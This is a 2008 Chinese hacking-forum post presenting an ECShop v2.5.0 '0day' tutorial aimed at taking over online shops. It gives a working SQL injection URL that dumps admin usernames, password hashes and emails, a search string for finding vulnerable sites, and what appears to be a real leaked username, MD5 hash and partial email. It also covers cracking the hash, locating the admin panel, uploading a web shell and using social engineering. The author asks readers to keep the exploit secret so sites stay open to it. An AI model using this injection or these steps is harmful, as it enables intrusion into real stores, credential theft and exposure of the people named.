|
|
楼主 |
发表于 2008-9-18 13:57:07
|
显示全部楼层
|阅读模式
来自 广东省广州市白云区
黑狼基地 菜鸟起飞的乐园www.nb5.cn
我们有狼的精神!有困难不怕,就怕遇不到困难
黑狼基地与朋友们携手共创美好明天!欢迎光临黑狼基地!
-------------------------------------------------------------------------
大家好,我是黑狼基地的mvp213,今天又来给大家做一个关于网店的0day教程,
漏洞代码如下user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*,可以爆出管理员的帐户,密码,邮箱,非常的危险,不过如果管理员的密码太过强大就不行了,不过如果你有毅力的话可以试试社会工程学,说到这里,多说一句,社会工程学绝对的很好,很强大,希望都能理解下啊,最后一句,0day的利用价值非常的大,请大家不要去宣传,宣传的后果就是以后就拿不到站了,而且可能会断了我拿0day的来路哦,因为我的0day是用非常手段获得的,哈哈,我做的教程肯定能让你拿下站点,至于渗透入服务器,那就要看你的经验了,废话少说,切入正题
\"Powered by ECShop v2.5.0\" ,关键词随便,也可以不写
\\n rae 用户名|8de33a33731b94c60f70d63adf1c1336 md5值去网上找破解 62523185|assam_r@hotma \\n
后台地址是/admin,也可能会被修改,看你的运气了,如果被修改,可用啊d查后台,进来了吧~~~哈哈哈,来看看如何拿shell,改下名字,哈哈,进来了,如何啊???入侵结束了,至于渗透,下次教程会做,我可以保证在1到2个星期就做一个教程,肯定是新的,不要怀疑是否有用,嘿嘿,因为你在质疑我的人品,我的QQ是345096,论坛ID是mvp213,谢谢大家,到此结束。
---------------------------------------------------------------------------------------------------------------------
教程下载地址:点击下载 |
|
发表于 2008-9-18 14:23:48
发表于 2008-10-19 22:24:47
